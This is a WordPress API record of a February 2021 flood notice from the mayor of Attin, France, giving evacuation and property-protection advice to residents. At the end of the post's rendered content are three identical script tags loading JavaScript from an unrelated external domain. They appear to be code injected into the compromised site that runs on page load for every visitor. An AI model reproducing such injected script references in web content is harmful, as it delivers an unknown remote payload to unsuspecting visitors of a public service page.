{"id":2789,"date":"2021-02-04T13:45:23","date_gmt":"2021-02-04T12:45:23","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?p=2789"},"modified":"2021-02-04T13:45:23","modified_gmt":"2021-02-04T12:45:23","slug":"inondations-recommandations","status":"publish","type":"post","link":"https:\/\/www.attin-mairie.fr\/?p=2789","title":{"rendered":"Inondations &#8211; Recommandations"},"content":{"rendered":"<p style=\"text-align: center;\"><strong>Communiqu\u00e9 Inondations \u2013 Jeudi 4 f\u00e9vrier 2021<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Transmis aux riverains concern\u00e9s<\/strong><\/p>\n<p>Des crues importantes observ\u00e9es sur l\u2019ensemble de la vall\u00e9e de la Canche et la vall\u00e9e de la Course &nbsp;affectent, en ce d\u00e9but f\u00e9vrier, la commune d\u2019Attin, rue du Marais et rue de la Vend\u00e9e, puis le quartier des friteries, avec d\u00e9j\u00e0 &nbsp;quelques habitations inond\u00e9es. Cette situation nous incite \u00e0 la plus grande prudence pour les jours et les semaines \u00e0 venir. En effet, nos craintes sont motiv\u00e9es par les importantes retenues d\u2019eau toujours stock\u00e9es en amont, mais aussi par les forts coefficients de mar\u00e9e attendus pour la p\u00e9riode du <strong>28 f\u00e9vrier au 4 mars 2021<\/strong>, puis du <strong>28 mars au 2 avril 2021, <\/strong>et qui pourraient aussi toucher d\u2019autres quartiers comme par exemple la zone de la rue de la Moli\u00e8re.<\/p>\n<p>Un Plan Communal de Sauvegarde (PCS) existe pour la commune depuis 2010 et reprend un dispositif de pr\u00e9conisations, de mise en s\u00fbret\u00e9 et s\u00e9curit\u00e9 avec le concours des services de l\u2019Etat. Il est activ\u00e9 lorsque les risques de mise en danger deviennent tr\u00e8s importants (voir ci-apr\u00e8s un exemple de PCS). <a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2021\/02\/pcs-exemple.odt\">pcs exemple<\/a><\/p>\n<p>Afin d\u2019anticiper une p\u00e9riode qui pourrait s\u2019av\u00e9rer tr\u00e8s pr\u00e9occupante pour certains riverains concern\u00e9s par ces crues, nous vous communiquons quelques conseils tels qu\u2019ils sont recommand\u00e9s par les services de l\u2019Etat, et qui sont bien s\u00fbr \u00e0 adapter \u00e0 chaque situation particuli\u00e8re&nbsp;:<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"614\">&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong>Pr\u00e9parez-vous \u00e0 \u00e9vacuer si cela devenait n\u00e9cessaire en pr\u00e9parant un sac avec m\u00e9dicaments, papiers importants, affaires de toilettes, v\u00eatements.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Restez attentifs aux consignes qui pourraient \u00eatre donn\u00e9es par la mairie.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Mettez les produits toxiques \u00e0 l\u2019abri des eaux.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Sollicitez les services de la mairie par t\u00e9l\u00e9phone si vous ne pouvez sortir de chez vous.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Sollicitez les services de la mairie si vous ne pouvez pas vous ravitailler en eau et nourriture.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Amarrez les cuves.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Montez dans les \u00e9tages les objets et papiers importants.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Conduisez les animaux d\u2019\u00e9levage sur les hauteurs.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Coupez le gaz et l\u2019\u00e9lectricit\u00e9 \u00e0 l\u2019approche de submersion des&nbsp; r\u00e9seaux \u00e9lectriques de votre habitation.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Eloignez vos v\u00e9hicules des zones inondables.<\/strong><\/p>\n<p><strong>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Sur\u00e9levez tous vos biens meubles, mat\u00e9riels et \u00e9quipements de valeur.<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>En tout \u00e9tat de cause, nous restons \u00e0 votre enti\u00e8re disposition pour assurer au mieux les obligations qui nous incombent. Sentiments d\u00e9vou\u00e9s.<\/p>\n<p>Philippe FOURCROY, Maire d\u2019Attin<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Communiqu\u00e9 Inondations \u2013 Jeudi 4 f\u00e9vrier 2021 Transmis aux riverains concern\u00e9s Des crues importantes observ\u00e9es sur l\u2019ensemble de la vall\u00e9e de la Canche et la vall\u00e9e de la Course &nbsp;affectent, en ce d\u00e9but f\u00e9vrier, la commune d\u2019Attin, rue du Marais et rue de la Vend\u00e9e, puis le quartier des friteries, avec d\u00e9j\u00e0 &nbsp;quelques habitations inond\u00e9es. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2802,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2789","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2789","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2789"}],"version-history":[{"count":1,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2789\/revisions"}],"predecessor-version":[{"id":2803,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2789\/revisions\/2803"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/media\/2802"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2789"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2789"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2789"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}